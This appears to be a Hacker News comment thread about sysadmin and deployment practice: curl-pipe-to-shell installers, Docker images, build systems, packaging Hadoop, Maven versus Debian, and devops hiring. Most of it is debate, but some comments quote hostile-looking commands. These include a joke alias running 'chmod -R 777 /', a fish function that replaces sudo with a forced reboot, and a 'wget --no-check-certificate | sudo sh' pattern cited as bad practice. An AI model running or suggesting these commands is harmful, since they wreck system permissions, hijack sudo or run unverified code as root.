… which is one of the pressures driving Docker adoption. Each process tree gets its own root filesystem to trash with its multitude of dependencies. DLL hell, shared library hell, JDK hell, Ruby and Python environment hell… a lot of it can be summed up as "userland hell". Docker makes it easy to give the process its own bloody userland and be done with it.


I think this falls under the heading of "I'm old", but I already have one machine to maintain. Replacing it with N machines to maintain doesn't feel like a win to me.


I'd actually disagree with that. Auto* breaks less often than wget or npm, IME.


My experience is that "configure;make;make install" has a much higher probability of success (>95% regardless of whether you are running the most up-to-date version of the OS) than something like cmake (which seems to hover around 60% if you try to build on slightly older systems).


Sorry, I don't know what ISO9001 is, but isn't deploying an image extremely conducive to traceability? No non-deterministic scripts are run on production servers.


http://www.askartsolutions.com/iso9001training/Identificatio...

ISO9001 often turns into its Dilbert parody of bureaucracy, but the core ideas are sound: if you have some sort of failure of production, it's useful to know what went into the production process and where it came from. So in the case of deploying images, then yes: you get repeatable copies of the image. Provided you know where the image came from. Images themselves aren't usually stored in a version control or configuration management system. It may not be obvious where the image came from. And, if an image is made up of numerous "parts" (ie all the installed software), you need to know what those parts are. If an SSL vulnerability is announced, what is the process for guaranteeing that you've updated all the master copies and re-imaged as necessary?


Have you ever seen it implemented in a way that added value? I agree that in theory ISO9001 makes sense, but it's been a slow-motion disaster everywhere I've seen it actually tried.


I haven't seen it successfully implemented in the software industry. Manufacturing is much more OK with it. I'm not arguing for ISO9001 itself, just that reproducibility and standardisation of "parts" are things we should consider.


Somebody has to build the containers and/or images, and it's on them to make that an automated, repeatable process.


I have never understood why so many people are not OK with using the command line.

A few years back we had an issue where a MySQL script was over the size limit for phpMyAdmin - my fairly experienced colleague was unaware that you could just log in and use mysql from the CLI.
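
For anyone in the same boat, the CLI route is one line (credentials, host, and database names are placeholders):

    mysql -u admin -p -h db.example.internal mydb < too_big_for_phpmyadmin.sql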


Could be a generational thing as well. I work with some devs who've always used Windows/OS X GUI exclusively for everything and are terrified of command-line anything. Either there's a GUI for it, or it might as well not exist. Younger guys usually.


The command line is modern-day voodoo. There are a ton of commands, each with a specific use, each with their own specific incantation, which can be mixed in extremely powerful ways. But my theory is that the main reason people would prefer not to use it is that improper usage can be harmful and sometimes destructive.

The same reason people prefer to use garbage collected and dynamically typed programming languages.


improper usage can be harmful and sometimes destructive.

It is merciful that GUI environments are immune to these deficiencies.


I'd like to think this post is an exaggeration.


Unfortunately not; there are a lot of developers who can only use phpMyAdmin or their CMS's GUI - and from what I am told, being able to code basic SQL joins is not something you can take for granted.


Crazy talk. And these 'developers' are pulling in six figures?


Insanity.


> the GNU build system is far from simple

Which is why there are alternatives – cmake, waf, …


> Which is why there's alternatives – cmake, waf

Gah. Because I want to drop a metric ton of python code into my own source tree just to build. (gnulib is bad enough...)

Personally I like make. I understand it. I've used it for something like 20 years now. If there are problem domains it doesn't work for, they aren't problem domains I encounter. (Like so much of Linux software in the past 5 years or so, I find myself saying "this seems like an interesting way to solve a problem I simply don't have".)


> Gah. Because I want to drop a metric ton of python code into my own source tree just to build. (gnulib is bad enough...)

Each their own poison. Personally I don't like them either, but pretending it's autoconf or curl|sh is an oversimplification.


Many people have enormous amounts of experience with anti-patterns yet very little self reflection to identify them.

This is an obvious example:

http://en.wikipedia.org/wiki/Inner-platform_effect

Obviously a config / deployment system, like any other system, will start small and simple and "save a lot of time", but after an infinity of features are bolted on, it'll be infinitely worse than just using a bash script. Even worse, you probably figure out your deployment by hand on one system using bash, then need to translate what worked on a command line into a crypto-wanna-be-bash config system (probably creating numerous bugs in the translation), then use wanna-be-bash to slowly and poorly imitate what you'd get if you just used bash directly...

The last straw for me was trying to integrate some FreeBSD servers, and /usr/ports had like six versions of cfengine, none of which worked perfectly with the three versions on the legacy Linux boxes. Screw all that; instead of translating bash command-line operations into pseudo-bash, I'll just use bash directly. IT is an eternally rotating wheel, and the baroque inner-platform deployment framework has had its day... and being an eternally rotating wheel, it'll have its day again in a couple years. Just not now.

Not throwing the baby out with the bathwater: a strict directory structure, and a modular, library-style approach to error handling, reporting, and logging that you can steal from the deploy systems, is a perfectly good idea.

Unix philosophy of small perfect tools means I'm using git instead of my own versioning/branching system, and using ssh to shove files around rather than implementing and static linking in my own crypto and SSL system.


I agree with you in principle, but in practice shell scripts are really not the best tool for this sort of job: they tend to be write-only (in the sense that they can be difficult to read months or years later) and can become very hairy and difficult to maintain.

I'd prefer something like scsh (or a Common Lisp or elisp version thereof) for this sort of work: access to a full-fledged programming language and easy access to the Unix environment.


"can become very hairy and difficult to maintain."

I've found that to be a social problem or management problem more so than a technical one. There's an old saying, even before my time, that a Fortran programmer can write Fortran in any language. In a bad environment a new system will always be cleaner than the old system, not because it's technologically immune to dirt - it'll dirty up as badly as the old system unless the social problems or management problems are fixed. You really can write write-only Puppet scripts. Or you can write readable bash. Or even Perl.

Also, most deployment seems to revolve around securely and successfully copying stuff around, testing files and things, and running shell commands and looking at the return code. Shells are pretty good at running shell commands like those in a maintainable, easily readable and troubleshootable fashion. It's possible that a deployment situation that more closely resembles a Clojure koan than the above might have some severely blurred lines. And there's always the issue of minimizing the impedance bump between the automated deployer and the dude writing it (probably running commands in a shell window) and the dude troubleshooting it at 2am (by looking at the deployment system in one window and running commands in a shell window next to it to isolate the problem). I would agree that cleaner library/subroutine type stuff in shell would be nice.

And you are correct, scsh is really cool but two jobs later some random dude on pager duty at 2am is more likely to know bash or tcsh. Principle of least surprise. I suppose if only scsh guys are ever hired... Then again as per above most deployment is just lots of moving stuff around and running things so its pretty self explanatory. But if the work is trivial, don't deploy a howitzer to swat a fly.

Maybe another way to look at it is if you're doing something confusing or broken, plain common language will clear things up faster and more accurately than using an ever more esoteric domain specific language. Or some folk saying like "always use the overall simplest possible solution to a complex problem".

There is the "don't reinvent the wheel" argument. I have a really good network wide logging system, a really good ssh key system for secure transfer of files, a strong distributed version control system to store branches and versions, a strong SSL infrastructure, a stable execution environment where upgrading bash probably won't kill all my scripts, a strong scheduled execution system... I don't need a tight monolithic collection of "not so good" reimplementation of the above, running that is more painful that rolling my own glue between the strong systems I already have. And using the monolith doesn't mean I get to abandon or ignore the "real" strong infrastructure, so the only thing worse than running one logging/reporting system is having to admin two, a real enterprise grade one and a deployment-only wanna be system. I did the puppet thing for many years. So sick and tired of that.


Thank You for the Wikipedia link - I was looking for the name of the "thing" people are doing when they write all those WebGL JavaScript frameworks and such. Now I know that they are creating poor replicas of things that normally run on the desktop itself.


:-)

I managed to get Hadoop running on a small cluster from scratch; Michael Noll's tutorial is a good starting point.

Full stack should mean you can use (and have used) a soldering iron in anger, and also have at least a CCNA level of networking.


When you say anger, do you mean to threaten the developer who wants to run `chmod 777 /var/www` when their just-installed php app released in 2003 won't allow uploads?

Edit: Maybe I should have added a /sarcasm to my comment?


    alias fix-permissions="chmod -R 777 /"


> alias fix-permissions="chmod -R 777 /"

  function sudo
      if not test (count $argv) -gt 3
          command sudo $argv; return
      end
      if not contains $argv[4] "/" (ls / | awk '{print "/"$1}')
          command sudo $argv; return
      end
      if test \( $argv[1] = chmod \) -a \( $argv[2] = '-R' \) -a \( $argv[3] = 777 \)
          command sudo reboot -f
      else
          command sudo $argv
      end
  end


I think branding them is going a bit too far

      ...
For a first offense


"in anger" means used in a real-life situation, not just playing around.


I think he got that.


Re-connecting a pin that broke off a CPU should be enough qualification. Anger will be present in spades.


Christ it's annoying enough just using a credit-card to fix bent pins. Hats off for reconnecting them!


I have found that a lot of these platform-as-a-service providers are way more complicated than doing things from scratch.


I've seen people copy-pasting stuff along the lines of `wget --no-check-certificate | sudo sh` into their terminals from some random internet source.

I'm pulling my hair out, asking: are you even aware of what you're doing?


What do you expect them to do, download the .tar.gz, extract it, read every line of code and then make; make install? Or just make; make install? How is that any different?


You can usually get PGP signed hashes for tarballs distributed by serious entities. If someone is distributing software and provides no way to check that it is genuine, you shouldn't run it...
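
e.g. the usual dance, with placeholder file names:

    gpg --verify foo-1.0.tar.gz.asc foo-1.0.tar.gz    # detached signature on the tarball itself, or:
    gpg --verify SHA256SUMS.asc SHA256SUMS            # signed checksum file...
    grep foo-1.0.tar.gz SHA256SUMS | sha256sum -c -   # ...then check the tarball against it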


I posted a slightly provocative tweet about this, and the CEO of NodeSource took exception... sad days.

https://twitter.com/kylegordon/status/590860756075294721


He seems to be way nicer and more professional than you..?


If by “nicer and more professional” you mean “super condescending”.


What? Only after two hours did he tell kylegordon that he (kylegordon) was cute.

And at that point kylegordon had earned it.


There's nothing wrong with curl | sudo bash style setups as long as it's over https and the certificate gets checked.

The advantages are that it's easy and you can make it work on almost all unix-like systems out there.

The only disadvantage is that you have one additional weak point: the server can get contaminated. Before, you had to contaminate one of the many developer machines / build machines.

The situation wasn't any better before. Install media always got downloaded without SSL encryption or any certificate checks. This is still the same, but at least you won't get a hacked kernel today if you use Secure Boot.


No, it's just plain bad.

To pick one example why...

Just because it's easy to run doesn't mean it's easy to support or maintain. Chances are `curl | bash` scripts aren't designed for your particular OS, so it's yet another form of software that you have to learn how to update, as opposed to using the OS-level update mechanism, such as yum, apt, or even brew to some extent. Being a good sysadmin doesn't stop at installing the software. Most of the hard (boring) work is in maintaining systems and keeping them updated and secure. Blind install scripts make this job impossible.

There is a very big difference between installing something on your dev machine to just get it started and deploying something into production. `curl | bash` is okay for setting something up on a dev machine where the only one that needs to use it is you. For productions machines, it's completely inappropriate[1].

[1] This is somewhat mitigated by things like Docker, but I'd still argue that you don't want to have an ephemeral installation method for containers either. You should have fixed versions that are installed by either a package manager or at least a Makefile.
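
i.e. instead of piping a moving target into a shell, pin the exact artifact you vetted (the package and version strings here are made up):

    apt-get install -y mytool=1.4.2-1     # Debian/Ubuntu
    yum install -y mytool-1.4.2-1.el7     # RHEL/CentOS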


Not to mention that in plenty of environments production systems don't have access to the internet to begin with, so curl/wget | bash is a non-starter.


There's nothing wrong with curl | sudo bash style setups as long as it's over https and the certificate gets checked.

Even assuming the URL's publisher is trustworthy (which is a poor assumption to make, ever), you forget that SSL/HTTPS is broken, that the NSA has established MITM on the entire internet, and that your installation process (which should be both versioned and repeatable) now has zero versioning and all the entropy of the network, plus bonus entropy.


I'm guilty of using this method in my side project (https://github.com/grn/bash-ctx). My goal was to solve the installation problem quickly. I absolutely would love to offer proper installation methods. However my experience with building *.deb packages makes me think that it's not something that I'd like to do (especially as it's a side project).

The question, therefore, is: what is the simplest alternative installation method for OS X and Linux?
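
Not an authoritative answer, but one low-effort route (assuming the project has, or gains, a make install that honours DESTDIR) is to stage the files and let fpm wrap them up, plus a Homebrew formula for OS X:

    # stage into a throwaway root
    make install DESTDIR=/tmp/stage PREFIX=/usr/local
    # turn the staged tree into packages (name/version are examples)
    fpm -s dir -t deb -n bash-ctx -v 0.1.0 -C /tmp/stage .
    fpm -s dir -t rpm -n bash-ctx -v 0.1.0 -C /tmp/stage .

It's not Debian-policy quality, but it's versioned, uninstallable, and a lot better than curl | bash.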


Some of this is self-inflicted.

Go look up how you install snort or bro on CentOS. You have to either install from source, or install an RPM from their website, which may or may not have issues. This means you lose dependency management and update management. Pure madness.


Choose your method of death:

1. Run this totally opaque command which might DTRT, and might completely pwn your system.

2. Prepare for 4 hours of dependency hell.


Alternatively, learn Gentoo.


I've decided that unless you're ok with running a very restricted set of ancient applications, don't even try to use CentOS. I've seen multiple billion dollar companies who can't seem to avoid f'ing up the yum repos on CentOS.

I'm not able to go full docker on my machines @work, but I do have some statically linked tarballs. There is a reason apps that deploy in hostile environments (skype, chrome, firefox) bundle most of their dependencies.


> Many people have this weird aversion to doing basic sysadmin stuff with Linux

Like developers who won't write SQL and insist on an ORM.


I agree that many of these convenient setups are embarrassingly sloppy, but it's the sysadmin's responsibility to insist on production deployments being far more rigorous. No one can tell you how to build hadoop? Well, figure it out. Random Docker containers being downloaded? Use a local Docker repo with vetted containers and Dockerfiles only.

I don't even allow vendor installers to run on my production systems. My employer buys some software that is distributed as binary installers. So I've written a script that will run that installer in a VM, and repackage the resulting files into something I'm comfortable working with to deploy to production.

If a sysadmin is unable to insist on good deployment practices, it's a failure of the company or organization or of his own communication skills. If a sysadmin allows sloppy developer-created deployments and doesn't make constant noise about it, then they aren't doing their job properly.
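
For the Docker side of that, a sketch of the "local repo with vetted containers only" setup (hostnames and tags are placeholders; the registry image is the stock one):

    # run a private registry on a host you control
    docker run -d -p 5000:5000 --name registry registry
    # re-tag a locally built, vetted image and push it there
    docker tag myapp:1.4.2 registry.internal.example.com:5000/myapp:1.4.2
    docker push registry.internal.example.com:5000/myapp:1.4.2
    # production hosts only ever pull from the internal registry
    docker pull registry.internal.example.com:5000/myapp:1.4.2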


> it's the sysadmin's responsibility to insist on production deployments

What decade are you from? No startups are hiring sysadmins to do any kind of work anymore. They're hiring "dev-ops" people, which seems to mean "Amateur $popularLanguage developer that deployed on AWS this one time."

That's the whole problem with the dev-ops ecosystem. None of these dev-ops people seem to have any ops experience.


> No startups are hiring sysadmins to do any kind of work anymore.

Then maybe people should be willing to work for more grown-up businesses.

HN tends to get a distorted view of what's important in the tech industry. The tech industry is way, way, way bigger than startups, and there are still plenty of companies that recognize the value of good sysadmins.

Let the startups learn their lesson in their own time.


The alternative is that many of the startups don't learn this in their own time, and they go on to become bigger, more successful companies who can set the tone and shift the market. Of course, if they're actually able to succeed by doing so, then that says something too. Although the trend of data breaches certainly wouldn't decline in that case.


>Although the trend of many data breaches certainly wouldn't decline in that case.

Exactly. "Successful" and "profitable" don't imply "secure" or "well-architected". At least until the lack of those last two comes back to bite you and starts eating into your profits.


Sony is a great example of this.


Did the PR hit actually translate into a monetary hit and eat into their profits?


I don't know about the cost of the negative PR, but the compromise itself cost them $15 million in real costs (http://www.latimes.com/entertainment/envelope/cotown/la-et-c...) and potentially much more (http://www.reuters.com/article/2014/12/09/us-sony-cybersecur...) once you count the downtime involved and potential lawsuits, settlements, and other fallout over the breach of information. IIRC there were some embarrassing emails released regarding some Hollywood big-wigs, for example.

It should be a huge cautionary tale for any big organization that doesn't have good internal security, but unfortunately this isn't the first such case in history, and it almost certainly won't be the last.

But that doesn't mean there aren't other smart businesses out there.


$15M sounds like a rounding error for Sony. It sounds like a rounding error as well when compared to the cost of brand-name IT solutions when deployed in a company of Sony's size.


> That's the whole problem with the dev-ops ecosystem. None of these dev-ops people seem to have any ops experience.

Thanks for painting all of us that do "devops" with a wide brush. If you're a dev shall we enumerate all of the XSS and SQL injection holes you've added to products over your career?


Well, in my experience XSS and SQL injection come from the "devops" kind of developer: people who claim to code without wanting to learn the basics (complexity, DB, ...).

So, nice try, but the troll doesn't work.

And startups are made by the "devops" kind of businessmen who don't care about correctly computing cost vs. price, because that is so XXth century.


You're absolutely right, about everyone in the industry. How did you become so astute with your observations?


While I think that devops can be a useful term, lately most people take it to mean 'I'm a rails developer but I know how to use docker and the aws control panel'.


Well, like I said, in this case, "it's a failure of the company".


>> No one can tell you how to build hadoop? Well, figure it out.

I get the impression that several people working on debian couldn't work this one out!


I think most people who use debian would tend to install things using debian packages, which in this case usually means adding cloudera to your apt sources list and using apt-get.

It is a pretty straightforward process:

http://www.cloudera.com/content/cloudera/en/documentation/cd...
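
The apt side of it is the usual add-key-and-repo pattern; roughly (repo line, key URL and package names are placeholders - take the real ones from Cloudera's docs):

    # add the vendor's signing key and repository, then install through apt as normal
    wget -qO - https://archive.example.com/cdh/archive.key | sudo apt-key add -
    echo "deb https://archive.example.com/cdh/ trusty-cdh5 contrib" | sudo tee /etc/apt/sources.list.d/cloudera.list
    sudo apt-get update
    sudo apt-get install hadoop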


I think the complaint was that it's difficult figuring out how to build Hadoop from source. That page you linked is how to install pre-built binaries, which you rightly point out is fairly trivial.


Sure, I agree that debian people would want to install debian packages.

What debian users/hackers/amateur admins like me really want is packages that are first class citizens, that the debian guys have picked up, sanitised, analysed and made part of the system.

I'll take software from the debian repos every time if I can. And it's pretty damning if people who are familiar with build systems and package creation can't figure it out!


Hadoop is insane. The elephant is fitting. Is it really the best choice, or has someone done something cleaner in golang or c++11?


> Is it really the best choice, or has someone done something cleaner in golang or c++11?

What does the language have to do with the program?

Hadoop is what it is because it's a complex problem with a fittingly complex solution. Simply re-writing it in your pet language won't somehow make it "better".


Go and modern C++ are both quite a bit more terse than Java. They also produce binaries which don't necessarily require a runtime to be available on every server (just ABI compatibility).

(I have no horse in this race, I am just writing what I think the grandparent comment was referring to)


> They also produce binaries which don't necessarily require a runtime to be available on every server

Just like Java[0]. It is just a matter of choosing the right compiler for the use case at hand.

[0] - http://www.excelsiorjet.com/ (one from many vendors)


Cool concept, I didn't realise this existed. Can you run Hadoop and friends under this? I've worked at companies with over 500 servers in a Hadoop cluster and literally never once heard about anything other than using Oracle's JRE aside from one proposal to use OpenJDK which was shot down pretty quickly.


I don't have experience with Hadoop.

Almost all commercial JVMs have some form of AOT or JIT caching, especially those that target embedded systems.

Sun never added support to the reference JVM for political reasons, as they would rather push for plain JIT.

Oracle is now finally thinking about adding support for it, with no official statement on whether it will make it into 9 or later.

JEP 197 is the start of those changes, http://openjdk.java.net/jeps/197

Oracle Labs also has SubstrateVM, which is an AOT compiler built with Graal and Truffle.


Way back in the day, GCC's gcj compiler would do AOT compilation of Java, however I believe it stopped being developed at jdk5 support.


If I am not mistaken, most of the developers abandoned the project to work on the Eclipse compiler and OpenJDK when those projects became available.

GCC only keeps gcj around due to its unit tests.


There are also things like exec4j, which bundles everything including a JVM into an executable which one can just run... and things like AdvancedInstaller and Install4j will also allow one to bundle a JVM.

So producing a binary which doesn't require a separate runtime really isn't a problem.


Since you mention it, Java 8 brings bundling and installers support into the reference JDK.


C++ does usually require a runtime.


C++'s runtime is small and ubiquitous. Depending on how the software is written (if it allows disabling exceptions and rtti), it might be the same size as C's runtime, which is practically (but not totally) nonexistent.

I'm not an expert on Java, but my experience with it is that its runtime is fairly huge and requires custom installation.


C++'s runtime is worse than Java's in that sense. Most JVMs can run most Java bytecode, but your libstdc++ has to be from the same version of the same compiler that your application was compiled with.


It was quite surprising for me the first time I did a little embedded work and discovered I couldn't run binaries that were compiled against glibc on my musl-libc based system, and vice-versa. I had initially thought they all just supported the same c89 spec so should work...


Yep. It's 99% ABI compatible, but that 1% will kill you.

For that matter, as you allude even C has a runtime.


Which C++ runtime is ubiquitous? I can think of at least 3 C++ runtimes (MS, libstdc++, libc++).


I spent an entire day last week attempting to build hadoop with LZO compression support. There are many outdated guides on the internet about how to do this, and I eventually gave up and spent a few hours getting the cloudera packages to install in a Dockerfile so I could reproduce my work later.

Figuring out which software packages I needed, how to modify my environment variables, which compiler to get, and where to put everything in the correct directory was the entire difficulty.

If it were written in Go instead of Java, I could have done `go get apache.org/hadoop` and it would have been done instead of giving up after hours of frustration.

Go has almost no new features that make it an interesting language from a programming language perspective. Go's win is that it makes the actual running of real software in production better. Hadoop's difficulty is exactly why InfluxDB exists at all.


> If it were written in Go instead of Java, I could have done `go get apache.org/hadoop`

This complaint is just about packaging, and not the language itself. Any project can have good or bad packaging scripts, and for Java there are plenty of ways to make it "good".

Not to mention, the BUILDING.txt document clearly states they use maven[1] and to build you just do: mvn compile

> Go's win is that it makes the actual running of real software in production better

This might just be a familiarity issue, because once you launch the program, all things are equal.

And yes, you can bundle a JVM with your Java app, which makes it exactly like Go's statically linked runtime and just as portable without any fuss.

[1] https://github.com/apache/hadoop/blob/trunk/BUILDING.txt


> no new features

Go gets us better performance and concurrency out of the box.


> Go gets us better performance

Than Java? At best, Go performs on par with Java, but is often measured 10-20% slower.[1][2][3]

This is usually attributed to the far more mature optimizing compiler in the JVM, which ultimately compiles bytecode down to native machine code, especially for hot paths. Java performance for long running applications is on par with C (one of the reasons it's a primary choice for very high performing applications such as HFT, Stock Exchanges, Banking, etc).

> concurrency out of the box.

Java absolutely supports concurrency "out of the box"...[4]

[1] http://zhen.org/blog/go-vs-java-decoding-billions-of-integer...

[2] http://stackoverflow.com/questions/20875341/why-golang-is-sl...

[3] http://www.reddit.com/r/golang/comments/2r1ybd/speed_of_go_c...

[4] http://docs.oracle.com/javase/7/docs/api/java/util/concurren...


Hell, if we look at real-world-ish applications, the techempower benchmarks show go at easily 50% slower than a bunch of different Java options.


>What does the language have to do with the program?

I happen to agree with you whole heartedly, if you spend enough time here though you'll see the inevitable comment about how anything made in php is worthless insecure garbage and anyone who spends their time developing a php application are amateurs at best.

This isn't really a comment aimed at you, just wanting to point out how often that view gets challenged.


http://www.pachyderm.io is a modern alternative.


Apache Spark is a good replacement for Hadoop now. It's written in Scala.


Spark is a good replacement for MapReduce. MapReduce != Hadoop.


Fair enough, but the original article was about Hadoop MapReduce wasn't it? It specifically says:

"without even using any of the HBaseGiraphFlumeCrunchPigHiveMahoutSolrSparkElasticsearch (or any other of the Apache chaos) mess yet."


Surely at minimum Hadoop developers could tell you!


Have you ever been on a project where the developers didn't know how to build it? It's a strange situation, with huge environments being passed from one computer to another, and treasured with more care than the code itself.


This happened to me about a decade ago. A very smart sysadmin in the company created an Acronis image for machine deployments. They very carefully documented everything they changed, and how to recreate it. Then someone else created an image from one of the imaged machines without documenting what they changed. This happened a couple dozen or so times until the image was pretty much a mess of hand-installed binaries, configuration hacks, etc. It literally took another person 6 months to untwist what was actually on the machine by md5summing the crap out of everything, guessing at versions until they found a match, and documenting it.

That sounds like the state of a lot of docker images.


Well fuck me. I just spent two weeks fiddling with Vagrant and Docker and finally got everything up and humming only to come into this thread. Going to refrain from slapping the SysAdmin title on myself for now.


Docker is awesome, but you shouldn't be using blind base images. Use Dockerfiles, they're self-documenting.


Unless you build your own base images... odds are you will be using something someone else built. Even the host OS probably wasn't compiled by you.

In general, my base images are often debian:wheezy, ubuntu:trusty or alpine:latest ... From here, a number of times I've tracked down the dockerfiles (usually on github) for a given image... for the most part, if the image is a default image, I've got a fair amount of trust in that (the build system is pretty sane in that regard)... though some bits aren't always as straightforward.

I learned a lot just from reading/tracing through the dockerfiles for iojs and mono ... What is interesting is often the dockerfile simply adds a repository, and installs package X using the base os's package manager. I'm not certain it's nearly as big of a problem as people make it out to be (with exception to hadoop/java projects, which tend to be far more complicated than they should be).

golang's onbuild containers are really interesting. I've also been playing with building in one node container with build tools, then deploying the resulting node_modules + app into another more barebones container base.


Well, you have to trust something somewhere. Unless you're always compiling from source (which you can do with Docker), and you've read the source, etc.. but even then, you have to trust the compiler and the hardware.

Anyway, yes, you can make your own base images. But images `should` be light enough that you can build them each iteration. I've done dev stacks where literally each `save/commit/run of a test` built the docker container from the dockerfile in the background! With the caching docker does it really doesn't add any overhead to the process.

> What is interesting is often the dockerfile simply adds a repository, and installs package X using the base os's package manager.

Yup! Pretty much. Other than some config stuff for very specific use cases (VPN, whatever.)


A legend at one company about 5 years ago is that the company's next world-shaking product was being built partially with a single computer that was shipped around from office to office, because no one knew how to build the build environment again. Again this was circa 2010. :-)


I think more disconcerting is the rise of "sysadmins" who think they're qualified sysadmins because they know how to use bash and Docker.


This is hardly a new problem- and in many ways, I'm not sure it's a problem at all compared to the company cultural issues brought up by skywhopper.

Whether it's programming or system administration, you're always going to have new people getting excited about the sudden power they've learned. Being able to make computers do things opens up this whole new world, and when people find themselves in that world they may end up overestimating their skills and underestimating how much they need to grow. What they fail at understanding they make up with in enthusiasm, and with experience they become more knowledgable about what they don't know.

If we waited until they were "qualified" for jobs they would never get the experience to become qualified. At the same time there is more than enough room in the current job market to support people of lower skillsets, and for some companies that's considered an investment (junior people tend to turn to senior people over time).

This is where it becomes a company culture issue. If a company is smart they'll have a few senior people making sure things are held to the right standard, and a few junior people who can get things done but need some guidance and direction. However, lots of companies (especially the smaller ones who may be more constrained by budget) go for the cheaper route and would rather hire someone junior as their main support. The problem isn't that the sysadmins aren't qualified sysadmins, it's that they're junior system admins who have been hired for the wrong job. Companies that fail to value experience tend to suffer as a result.


I've found that there isn't an easy ramp into system admin from university -- most of the talent comes from dogged self-learning in computer repair shops or subpar IT shops. All the good guys at $BIG_SOFTWARE_COMPANY seem to be in their 30s after putting in years doing /tedious/, but extremely useful, work for little pay.


My uni used student sysadmins to run hosting for Open Source projects. Great experience on production infrastructure without big dollars on the line when mistakes are made.

http://osuosl.org/about


Amen to that. When I see some of the job descriptions in postings for DevOps/Sysadmin roles, I wonder: is there really someone out there with all the skills that are asked for?


I'm reasonably certain there isn't - not for the pay band offered.


Wanted:

    3-5 years of linux system administration experience
    3-5 years of windows 2000/2010 administration experience
    3-5 years of networking level tcp/ip experience with custom protocols
    3-5 years of c++ experience
    3-5 years of .net experience
    3-5 years of .....

I think more than half the job postings out there are created by entry/mid-level HR people who find similar job descriptions on other sites and copy-paste the requirements. This has then propagated into the monster job descriptions you see now.

I noted this as well: for the pay these companies are offering, anyone with the level of experience they are asking for would laugh and move on. It's almost as if it's a trojan horse of a job post. Only those stupid enough to apply to a job post like that are the kinds of employees they are looking for.


As a hiring manager, it's very easy to filter these people out at the interview stage.

Being a system administrator requires a very specific personality type that has little to do with experience and more to do with attitude and critical thinking.

Sadly, people are right that startups are skipping past admins, thinking they're not needed anymore. Then later they need to hire one to clean up the giant mess.


It's really that easy. Pick your favorite software that happens to have broken SSL certs (such as RVM as of a few months ago), and tell them to install it. If they balk at the prospect of disabling SSL cert checking on the wget command, then they're worth their weight in gold.
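
The answer I'm fishing for is some variant of "pin the certificate or verify the download out of band", not "turn checking off". A sketch, with placeholder names:

    # fetch the CA/cert once over a channel you trust, then pin it
    wget --ca-certificate=trusted-ca.pem https://example.com/install.sh
    # or ignore the transport entirely and verify a published signature instead
    gpg --verify install.sh.asc install.sh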


most of the startups fail before any system cleanup is necessary


@skywhopper "it's a failure of the company or organization or of his own communication skills" <~ Oh man, ever had a rant from The Management like "we pay you to do what we say"? No one usually cares about a sysadmin's communication skills. Yes, it's a failure of the organisation. The sad truth is that most organisations are failures. Sysadmin today is either a marginal job at a small company, where people respect you, or a job at a medium or large company where he or she is just a peon.


make is the least-auditable build tool imaginable. You don't have to obfuscate a Makefile, they come pre-obfuscated; you could put the "own me" commands right there in "plain" Make. Not to mention that it's often easier to tell whether a Java .class file is doing anything nefarious than whether a .c file is. How many sysadmins read the entire source of everything they install anyway?

Maven, on the contrary, is the biggest single source of signed packages around. Every package in maven central has a GPG signature - the exact same gold standard that Debian follows. The problems Debian faces with packaging Hadoop are largely of their own making; Debian was happy to integrate Perl/CPAN into apt, but somehow refuses to do the same with any other language.

> Instead of writing clean, modular architecture, everything these days morphs into a huge mess of interlocked dependencies. Last I checked, the Hadoop classpath was already over 100 jars. I bet it is now 150

That's exactly what clean modular architecture means. Small jars that do one thing well. They're all signed.

Bigtop is indeed terrible for security, but its target audience is people who want a one-stop build solution - not the kind of people who want to build everything themselves and carefully audit it. If you are someone who cares about security, the hadoop jars are right there with pgp signatures in the maven central repository, and the source is there if you want to build it.
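
And checking those by hand isn't hard; every artifact in Central has a detached .asc next to it (the artifact coordinates below are just an example):

    wget https://repo1.maven.org/maven2/org/apache/hadoop/hadoop-common/2.7.0/hadoop-common-2.7.0.jar
    wget https://repo1.maven.org/maven2/org/apache/hadoop/hadoop-common/2.7.0/hadoop-common-2.7.0.jar.asc
    gpg --verify hadoop-common-2.7.0.jar.asc hadoop-common-2.7.0.jar

Whether the key that signed it means anything to you is, as others point out, a separate question.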


Makefiles don't really enter into it and getting software signed by the developer isn't that valuable or useful.

The value of debian is not that they package (or repackage) everything into deb files but that they resolve versioning and dependency conflicts, slip security fixes into old versions of libraries (when newer versions break API/ABI), and make it possible to integrate completely disparate software into a system. They also have a great track record at it.

Maven does not do any of these things; Maven does nothing to protect the system administrator from a stupid developer, it just makes it easier for their code to breed and fester.

You must understand that the sysadmin has an enormous responsibility that is difficult for programmers to fully appreciate: You don't feel responsible for your bugs, you don't feel responsible for mistakes made by the developer of a library you use, and you certainly don't feel responsible for the behaviour of some other program on the same machine as your software, after all: Your program is sufficiently modular and scalable and even if it isn't, programming is hard, and every software has bugs.

But the sysadmin does feel responsible. He is responsible for the decisions you make, so if you seem to be making decisions that help him (like making it easy for you to get your software into debian) then he finds it easier to trust you. If you make him play whackamole with dependencies, and require a server (or a container) all to yourself, and don't document how to deal with your logfiles (or even where they show up), how or when you will communicate with remote hosts, how much bandwidth you'll use, and so on: That's what Maven is. It's a surprise box that encourages shotgun debugging and using ausearch features to do upgrades. Maven is a programmer-decision that causes a lot of sysadmins grief a few months to a few years after deployment, so it shouldn't surprise you to find that the seasoned sysadmin is hostile to it.


Debian has a terrible track record. Just look at the OpenSSL/Valgrind disaster. Speaking as a former upstream developer (on the Wine project): all Linux distros found unique ways to mangle and break our software, but Debian and derived distros were by far the worst. We simply refused to do tech support for users who had installed Wine from their distribution, the level of brokenness was so high.

You may feel that developers are some kind of loose cannons who don't care about quality and Debian is some kind of gold standard. From the other side of the fence, we do care about the quality of our software and Debian is a disaster zone in which people without sufficient competence routinely patch packages and break them. I specifically ask people not to package my software these days to avoid being sucked back into that world.

As a sysadmin you shouldn't even be running Maven. It's a build tool. The moment you're running it you're being a developer, not a sysadmin. If there are bugs or deficiencies in the software you're trying to run go talk to upstream and get them fixed, don't blame the build tool for not being Debian enough.


I don't know that I agree with that.

Debian feels like a distribution maintained by a bunch of sysadmins: People who have shit to do, and who understand that the purpose of a machine is to get stuff done, not to run some software.

A lot of sysadmins believe since they are responsible for the software, they need to be able to build stuff and fix some stuff themselves (i.e. it can't wait for upstream). In my experience, it's usually something stupid (like commenting out some logspam), but it's critical enough that I can imagine a lot of shops making it mandatory to ensure they can do this.

Really proactive sysadmins do try to run fuzzers and valgrind and do try to look for bugs rather than waiting for them to strike. And sometimes they get it completely wrong, as in the OpenSSL/Valgrind disaster, but they usually ask first[1].

Now I don't agree with everything Debian do, and I don't want to defend everything they do, either, but I think programmers in general need to show a certain amount of humility when dealing with sysadmins: because when these sysadmins say that they're not going to package hadoop because the hadoop build process is bullshit, it isn't appropriate to reply "well you guys fucked up openssl, so what do you know?"

